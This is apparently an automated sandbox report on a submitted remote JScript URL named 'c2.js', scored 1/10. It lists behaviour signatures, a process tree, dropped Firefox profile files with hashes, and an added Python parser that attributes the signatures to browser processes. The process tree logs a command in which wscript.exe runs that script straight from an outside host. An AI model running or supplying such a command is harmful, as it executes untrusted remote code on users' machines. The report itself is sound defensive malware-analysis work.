Analysis

  • max time kernel
    113s
  • max time network
    110s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    07/06/2023, 06:20

General

  • Target

    https://jolyfact-01.net/c2.js

Score
1/10

Malware Config

Signatures

  • Checks processor information in registry (2 TTPs, 5 IoCs)

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of FindShellTrayWindow (4 IoCs)
  • Suspicious use of SendNotifyMessage (3 IoCs)
  • Suspicious use of SetWindowsHookEx (4 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)
  • Uses Task Scheduler COM API (1 TTP)

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe https://jolyfact-01.net/c2.js
    1⤵
    PID:4444
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:3852
  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      2⤵
      • Checks processor information in registry
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3984
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.0.1511109978\1238909156" -parentBuildID 20221007134813 -prefsHandle 1836 -prefMapHandle 1820 -prefsLen 20890 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1790522c-5bf9-43eb-b619-c196980942ba} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 1932 2301b7fbd58 gpu
        3⤵
        PID:1776
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.1.1884536100\1029783474" -parentBuildID 20221007134813 -prefsHandle 2304 -prefMapHandle 2300 -prefsLen 20926 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29db04f9-6b6e-423f-8aa6-fe661e48ab0a} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 2316 2300e86fb58 socket
        3⤵
        PID:2024
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.2.414009028\498453393" -childID 1 -isForBrowser -prefsHandle 3168 -prefMapHandle 3088 -prefsLen 21009 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5153401-9523-4c64-a23f-0b6b69db0527} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 3240 2301f4e0758 tab
        3⤵
        PID:4404
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.3.656749555\1071318105" -childID 2 -isForBrowser -prefsHandle 2360 -prefMapHandle 1456 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c610376-3b07-4017-84c8-1757088f989f} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 3520 2300e867258 tab
        3⤵
        PID:372
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.4.164118177\1819612802" -childID 3 -isForBrowser -prefsHandle 4152 -prefMapHandle 4144 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b1b15be-2ac6-4bbd-b942-43dec3628453} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 4168 2300e861c58 tab
        3⤵
        PID:4924
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.5.1611192010\175257933" -childID 4 -isForBrowser -prefsHandle 5024 -prefMapHandle 5020 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d9ce037-618a-4618-a0e1-084571532bbe} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 5036 23021d9df58 tab
        3⤵
        PID:4024
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.7.898138717\509911983" -childID 6 -isForBrowser -prefsHandle 5324 -prefMapHandle 5328 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42e65721-c0f7-410c-9b31-e3cf54dde093} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 5316 23021d9d058 tab
        3⤵
        PID:632
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.6.396735895\228659927" -childID 5 -isForBrowser -prefsHandle 5128 -prefMapHandle 5132 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43a5b704-3089-45b0-b5b1-c5962b10c3fd} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 5056 23021d9ee58 tab
        3⤵
        PID:4028
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.8.626769518\1928135540" -childID 7 -isForBrowser -prefsHandle 1628 -prefMapHandle 4576 -prefsLen 26595 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {399ec4d0-a160-4773-bdd3-1288bc8dd225} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" 2936 2300e82d258 tab
        3⤵
        PID:984
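
The Signatures list and the process tree are only meaningful together: the sandbox attributes each signature to the process it fired on, and the depth markers (1⤵, 2⤵, 3⤵) carry the parent/child structure that the flattened rendering of the tree loses. The Python script below is an added example, not part of the sandbox's output; its REPORT string is an excerpt of the tree above, constructed for this example (PIDs, depth markers and signature names copied from the report, the long Firefox content-process command lines shortened, and only two of the eight content processes kept). It rebuilds the tree from the depth markers rather than the indentation and reports, per root process, how many descendants it has and which signatures fired anywhere in its subtree.

```python
"""Rebuild a sandbox process tree from its depth markers and attribute
signatures to the processes they fired on.  Added example, not sandbox
output; REPORT is a constructed excerpt of the tree above with the
Firefox content-process command lines shortened."""
import re
from dataclasses import dataclass, field

REPORT = r"""
• C:\Windows\system32\wscript.exe
  wscript.exe https://jolyfact-01.net/c2.js
  1⤵
    PID:4444
• C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  1⤵
    PID:3852
• C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  1⤵
  • Suspicious use of WriteProcessMemory
  PID:1936
  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    2⤵
    • Checks processor information in registry
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3984
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.0.1511109978\1238909156" gpu
      3⤵
        PID:1776
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3984.2.414009028\498453393" -childID 1 -isForBrowser tab
      3⤵
        PID:4404
"""

PATH_RE = re.compile(r"^• ([A-Za-z]:\\.+)$")   # bullet whose text is an image path
DEPTH_RE = re.compile(r"^(\d+)⤵$")            # tree depth marker, 1 = root
PID_RE = re.compile(r"^PID:(\d+)$")


@dataclass
class Proc:
    image: str
    cmdline: str = ""
    depth: int = 0
    pid: int = 0
    signatures: list = field(default_factory=list)
    children: list = field(default_factory=list)


def parse_tree(text):
    """Build the tree from depth markers; indentation is ignored entirely."""
    roots, last_at_depth, cur = [], {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := PATH_RE.match(line):            # a new process entry starts
            cur = Proc(image=m.group(1))
        elif cur is None:
            continue
        elif m := DEPTH_RE.match(line):         # attach to the latest process one level up
            cur.depth = int(m.group(1))
            last_at_depth[cur.depth] = cur
            parent = last_at_depth.get(cur.depth - 1)
            (parent.children if parent else roots).append(cur)
        elif m := PID_RE.match(line):
            cur.pid = int(m.group(1))
        elif line.startswith("• "):             # a signature that fired on this process
            cur.signatures.append(line[2:])
        elif not cur.cmdline:                   # first free-text line is the command line
            cur.cmdline = line
    return roots


def walk(procs):
    for p in procs:
        yield p
        yield from walk(p.children)


def find(roots, pid):
    return next((p for p in walk(roots) if p.pid == pid), None)


def signature_attribution(roots):
    """Map each signature name to the set of PIDs it fired on."""
    out = {}
    for p in walk(roots):
        for sig in p.signatures:
            out.setdefault(sig, set()).add(p.pid)
    return out


def subtree_summary(root):
    """Descendant count and distinct signatures for one root process."""
    descendants = list(walk(root.children))
    sigs = sorted({s for p in [root, *descendants] for s in p.signatures})
    return {"image": root.image, "pid": root.pid,
            "descendants": len(descendants), "signatures": sigs}


if __name__ == "__main__":
    tree = parse_tree(REPORT)
    for root in tree:
        s = subtree_summary(root)
        print(f"{s['image']} (PID {s['pid']}): {s['descendants']} descendants, "
              f"signatures={s['signatures'] or 'none'}")
    for sig, pids in sorted(signature_attribution(tree).items()):
        print(f"  {sig}: PIDs {sorted(pids)}")
```

Run against the excerpt, the summary shows wscript.exe (PID 4444) with no children and no signatures, rundll32.exe (PID 3852) likewise, and every signature in the list attributed to firefox.exe (PIDs 1936 and 3984) and its content processes. The same holds for the full tree above, so the flagged behaviours are browser activity rather than anything the submitted script did, which is consistent with the low score. The same parser works on any report in this layout because it keys on the depth markers and the PID: lines, not on the extraction's indentation.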

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\activity-stream.discovery_stream.json.tmp
    Filesize  149KB
    MD5       eaca3736813f246a0a1be48f54f0e1fa
    SHA1      d6f06204139e5e5301d6dfd4b2c03dd6e3028956
    SHA256    080dcb517de4bb6b87f531f75e2d2f7b6100c3d82cf81534f250b02ce29ddeee
    SHA512    0464157358e1b40ea6930943d6e94bc7a12e25c9052447b168b80cfad367df1a5ef53045dbe7759f96d59baf73c59fbe0b9e0c47db46436c214e359a46065014

  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\prefs-1.js
    Filesize  6KB
    MD5       7b90a6c808f79b4172699a5e64d5c273
    SHA1      d52d885f8c55136ea1dc016bc1bc9f5479d78f39
    SHA256    2be6434d4613b6dbdcb7da421d43673ba6e30b5beafb7b90e9708806a670edf3
    SHA512    cfb6a3dbe45155cce5b9dc56c171e417a1a4d114218d98b88964aa14846d37fafef454a3f52ca49500bfe23de393aca0056a0210f7e10f63ec8436fdf006cc21

  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\prefs-1.js
    Filesize  6KB
    MD5       f58454c824a65dbbb4f3847d936af9a4
    SHA1      316a2321174349b4880f7078090d0e7fdc3cd69c
    SHA256    f8e67abe9968a3331fa8dec685ebbc5c11f43e98ac76a7de4616fc3b5a74b36c
    SHA512    a19d08a4760cb7aedea491a06bb586c2bebc64e8809fded0973b5ce520c5a0488b7171b36591c937edc765e4cec0883891f70c3f350fae2610cad3f4e03953d6

  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\prefs-1.js
    Filesize  7KB
    MD5       54d52079c26e498df7f7ce199f2ef19e
    SHA1      30d670a9313bf8e3f1bb1941ece8d41782432244
    SHA256    1f79fb2a298aea114419bca7fabf27a4f71935af9dc85945c33ad1905853d3a9
    SHA512    e20dece1be74919bcf8326e102211980468921849e929f2230878faf15c542d9875b8f23adb32fb677ce04ce3fe95bfc674f5f3a8d2cab2d3bb66148cd2cb87d

  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\prefs-1.js
    Filesize  6KB
    MD5       f342afd8218aa43085c13ef9c12a0cce
    SHA1      d9f833f32ddb91797fea8674dfa107cfed8e9b8b
    SHA256    143b8bda0e84939b7490f9a3ee9ea25a172261b360c7128a3fb8196c02b9a361
    SHA512    6cc02674348d1b9e7463bae895d3f01d35b79ec90e79d1f99845843e962dd212767b627f5b2b21602209193b9fd0a6ef264f8b14e2d70c93af46f599445beffc

  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\prefs.js
    Filesize  6KB
    MD5       1984b45f201f1fd79d2154406648433b
    SHA1      42f082dc6d4d43333688690bf4dfa7c7f8b618ab
    SHA256    000a408519010d12b94281710f9a987f822093a1efb5293bbb50ca2e4a6a9df9
    SHA512    e73a00cc8994d4023168e93ff5f5b6e6b13ffeb740872b64f565787cbb57e49e64eb03e4de1d8068a6f303f0615749fb27cb47bdbc4cef3fef1290bd3a3a17cc

  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\sessionstore-backups\recovery.jsonlz4
    Filesize  1KB
    MD5       5f7c898fb363dcd09b64d95510a5e4b4
    SHA1      2b08f2fadc81b72cc2aaa1c8ec23bebd05a9f0fd
    SHA256    9cb7417638072d502dddd86158054babe8f50d8d4edd5c44733a788343f2f932
    SHA512    f911fb6a4a8368a80c29654acec488e9c5d2757496492bbf955b9310b620cd6aab4b481ff08ee7bb6b33dead3ce221a4c4f447f435aaed2da80359916ab46982

  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o4pebi0.default-release\sessionstore-backups\recovery.jsonlz4
    Filesize  1KB
    MD5       1ec0996215e6e8b763ac74522b017ccd
    SHA1      88173fe871b8fb2484e0f5db58a0b30737f0531c
    SHA256    258f9b5a5f38f161a36322afcc77a10c03e36eb6ac2676cae29b224cbe5d4bf4
    SHA512    b9b3457f57036b6f934f1c92d7f41fb3ec4b7a71b64dba979394b57ca5f1d6a24f9409c3ecae548000dcee225c58696d21c3a2486dbe51b73277b009d15a21fc